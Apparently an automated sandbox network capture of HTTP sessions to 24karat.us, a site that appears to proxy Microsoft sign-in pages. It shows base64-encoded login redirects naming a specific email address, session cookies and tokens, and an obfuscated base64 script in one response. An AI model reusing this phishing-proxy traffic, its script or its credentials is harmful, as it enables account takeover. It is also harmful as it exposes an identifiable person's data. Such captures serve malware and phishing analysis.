                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vjam9Q9fovrpYCAQ4myY9M05AIOimDB5DZYoIiMXeX1eJ%2Bz9%2BEtk8C92%2FE798vYg1EEX7Oks6s6lw4tfxgTLrHibCtj9pAbWVbaOaiMK10G4nVaowGfxxlRJYX4WUwR%2FvXKqB9%2BPyQ61qRFQOSSkDM7PQMEG5KABwcVw23bni84%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8686d813284c4262-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:24:13 UTC784INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72
                                      Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
                                      2024-03-22 14:24:13 UTC1369INData Raw: 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f
                                      Data Ascii: goe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;co
                                      2024-03-22 14:24:13 UTC1102INData Raw: 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                      Data Ascii: bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-colo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.449777162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:13 UTC3389OUTGET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=&sso_reload=true HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      Referer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUgIqrJqaS-tOc1s6BT-joOb3kURJuKMJLK3JyzXobixdYjiAA; fpc=AnAxjE-_txJPjQb7YYiXMlU; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd828fF6I_XkBu9671vguo1Q-kUj_aaWavCZbbevWme2Iye5T7j5evWQA9m7zcoikJfzS2vlzmFf7HRVxoZwN2oO7hhr3V4eB-Y53a95UCEfmIL7cAmUFARrV8dZ_bC-AirXdhJ0AzcrEQHwh7utoz485kNe-KtFuVC1ODAc4cxDK8gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                      2024-03-22 14:24:14 UTC3774INHTTP/1.1 302 Found
                                      Cache-Control: no-store, no-cache
                                      Pragma: no-cache
                                      Content-Type: text/html; charset=utf-8
                                      Expires: -1
                                      Location: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqVkZOYU5OZ0FNM1hkSEdkMDNVN0RSU1VJQWliYWZQWFpDME1sbTVKTzl1NldacXRWcVFrYVpLbVRmdGxTNXAyZi1CSkJDOWpoeDJHSl9HMDB4QVJtUmNQbm5heDU1M0VpMlhDbUo1MkV0ZDU4YWJ2OEhqd2VEeDRid0tsSWxUaUR2a0hOTkZuZ2pRTWl0RDB2dm9McTJORDRkR1hOOEROdDcxM2tmVlAzMzdzZnBfWkE2R3liZmw2UklPTmZYQ3I2bm1PbTRoR1ljdXpJYXhIb0dGWTJxVVpoVzBsLWg2QUxnQTlBSFlDb3pVVDJqT3FxZGxXMDlJdTR3R2VZNlpZanFkWU9rWlJQRTJ4TEIzaFl6ckhzU3BEc0xHWVFiQUtyeEFxcC10RW5LZmpsR0pvUmtXZE9nNk1MQWd0cjByM0NhNWE2X3JQUU1pQXE0MnlBMTF2RDMwQjVqUzNJOEtjS1lySnZDVVplYkc1MUtFcnNsWG5jcXdwenMyTEtYT3RUbmpacVNMUE9QbWt4U1c1U2pIdGlpVF9xSlpUQkZySXRKT3lGbmVGYW9vcktHSkhWaVI3cGJNbVFZRmZUc1pya0NXV2FMb1M3eWhGZ3ZkRko5c3E4WDR4WFY0czBJN2Q5bVM3eUdRZkdMN3E2ZTNjUHZwZlk3OUJzWXROR3JCNWhHTFEwWnRXcFJzRVg0TGdKRGhNb29uQndhRXdNbzdjUnM2RDROWEF4Uy1KOGRlN1g1LU9acDV0ZGpmdkpoM2thQ0RxcElSVXFkbVJkY3RORnlSSjR1NlhhdkVWcGxUTlN5b3BMc2UxdEo5WmdISmhQaVZQc3dscUd3UGJHSGFJaFFiUk1JS2pzNHRVRHdObkdIaC1CVGtNX2V2WTdsVndNQXlPaDlraFRMTVZxLUdPVFd6Z1ZxWHN3YnJleEJNYmVLZmhsald0cjN6RmJ1a3VubmlNWDFUZ1Q3YTJ0ajVlUTg2dm4tMmNfdnJ3ZWVjMGZUSnlMNlpJRlVNMVo5dFpsWkUxZWxKNjZKTkxRcWFWTDVpcFpZY2hWeWpEdFNjenF0bUMwd2RoNURjMSZsb2dpbl9oaW50PWpnb2wlNDBiZ2NsaW5pYy5jb20mZXN0c2ZlZD0xJnVhaWQ9MDExYjljMTFiNDFjYjZlODJlN2FjNGU3ZjE5NmViNDAmY29icmFuZGlkPWRlYjNmNzRhLWVkNWItNGVmMS04ZDNjLTkyYjg1ZGQ0NzM1MiZmY2k9MDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIw==
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                      x-ms-request-id: 96a4183a-80e2-4b11-867c-d07c27427000
                                      x-ms-ests-server: 2.1.17573.7 - NCUS ProdSlices
                                      nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                      Referrer-Policy: strict-origin-when-cross-origin
                                      Set-Cookie: buid=0.AXgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8H7b1oBbQY25R6SkXdYFiwKR4ttfGBxLY18KiC2gtsetOJalgsuPnYMYk1ezNGDCk5fSzjgtSgmMC443JqOQh2RbqnkPE8nMmMvn6jrqFWMwgAA; expires=Sun, 21-Apr-2024 14:24:14 GMT; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: esctx-gjXmeQLJekA=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8BDfVgdv8EX-JAd578OfrhVZ2W4dyehwTUSe_lxMXA6XYnt_wfxcJNAjdnRBN2IcTzvfk479nmwS1tuc9K5f47CfKec9aZ4oplLvgwgpesJ5ho3NCPE-bMGXwoeB_qwpESMCUB1ZEFZWa3reEcYUT4yAA; domain=24karat.us; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: fpc=AnAxjE-_txJPjQb7YYiXMlWerOTJAQAAAI2Lj90OAAAA; expires=Sun, 21-Apr-2024 14:24:14 GMT; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: cltm=CgAQABoAIgQIDBAF; domain=24karat.us; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                      Date: Fri, 22 Mar 2024 14:24:13 GMT
                                      Connection: close
                                      content-length: 1908
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                      2024-03-22 14:24:14 UTC1908INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65
                                      Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.449778172.67.132.204433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:13 UTC380OUTGET /favicon.ico HTTP/1.1
                                      Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:13 UTC585INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:24:13 GMT
                                      Content-Type: text/html;charset=UTF-8
                                      Content-Length: 3255
                                      Connection: close
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BpuB5YWCDoPG%2BJSb6XafrT9U%2B1qaNrG2WX2236%2BLN4mh3rSWbl7w9nc3CTByMdi1idjSEF29mf%2FrUc8EP%2FpELpUePPjGTu3XylqXdQKabZHRLNnRLjhJhSf2czw5NlfQmq035EvOI21xDk7WfJwGpd8PHvHDU96HzYel4s9SGTk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8686d815cd794246-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:24:13 UTC784INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72
                                      Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
                                      2024-03-22 14:24:13 UTC1369INData Raw: 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f
                                      Data Ascii: goe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;co
                                      2024-03-22 14:24:13 UTC1102INData Raw: 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                      Data Ascii: bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-colo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.449779162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:14 UTC4580OUTGET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqVkZOYU5OZ0FNM1hkSEdkMDNVN0RSU1VJQWliYWZQWFpDME1sbTVKTzl1NldacXRWcVFrYVpLbVRmdGxTNXAyZi1CSkJDOWpoeDJHSl9HMDB4QVJtUmNQbm5heDU1M0VpMlhDbUo1MkV0ZDU4YWJ2OEhqd2VEeDRid0tsSWxUaUR2a0hOTkZuZ2pRTWl0RDB2dm9McTJORDRkR1hOOEROdDcxM2tmVlAzMzdzZnBfWkE2R3liZmw2UklPTmZYQ3I2bm1PbTRoR1ljdXpJYXhIb0dGWTJxVVpoVzBsLWg2QUxnQTlBSFlDb3pVVDJqT3FxZGxXMDlJdTR3R2VZNlpZanFkWU9rWlJQRTJ4TEIzaFl6ckhzU3BEc0xHWVFiQUtyeEFxcC10RW5LZmpsR0pvUmtXZE9nNk1MQWd0cjByM0NhNWE2X3JQUU1pQXE0MnlBMTF2RDMwQjVqUzNJOEtjS1lySnZDVVplYkc1MUtFcnNsWG5jcXdwenMyTEtYT3RUbmpacVNMUE9QbWt4U1c1U2pIdGlpVF9xSlpUQkZySXRKT3lGbmVGYW9vcktHSkhWaVI3cGJNbVFZRmZUc1pya0NXV2FMb1M3eWhGZ3ZkRko5c3E4WDR4WFY0czBJN2Q5bVM3eUdRZkdMN3E2ZTNjUHZwZlk3OUJzWXROR3JCNWhHTFEwWnRXcFJzRVg0TGdKRGhNb29uQndhRXdNbzdjUnM2RDROWEF4Uy1KOGRlN1g1LU9acDV0ZGpmdkpoM2thQ0RxcElSVXFkbVJkY3RORnlSSjR1NlhhdkVWcGxUTlN5b3BMc2UxdEo5WmdISmhQaVZQc3dscUd3UGJHSGFJaFFiUk1JS2pzNHRVRHdObkdIaC1CVGtNX2V2WTdsVndNQXlPaDlraFRMTVZxLUdPVFd6Z1ZxWHN3YnJleEJNYmVLZmhsald0cjN6RmJ1a3VubmlNWDFUZ1Q3YTJ0ajVlUTg2dm4tMmNfdnJ3ZWVjMGZUSnlMNlpJRlVNMVo5dFpsWkUxZWxKNjZKTkxRcWFWTDVpcFpZY2hWeWpEdFNjenF0bUMwd2RoNURjMSZsb2dpbl9oaW50PWpnb2wlNDBiZ2NsaW5pYy5jb20mZXN0c2ZlZD0xJnVhaWQ9MDExYjljMTFiNDFjYjZlODJlN2FjNGU3ZjE5NmViNDAmY29icmFuZGlkPWRlYjNmNzRhLWVkNWItNGVmMS04ZDNjLTkyYjg1ZGQ0NzM1MiZmY2k9MDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIw== HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
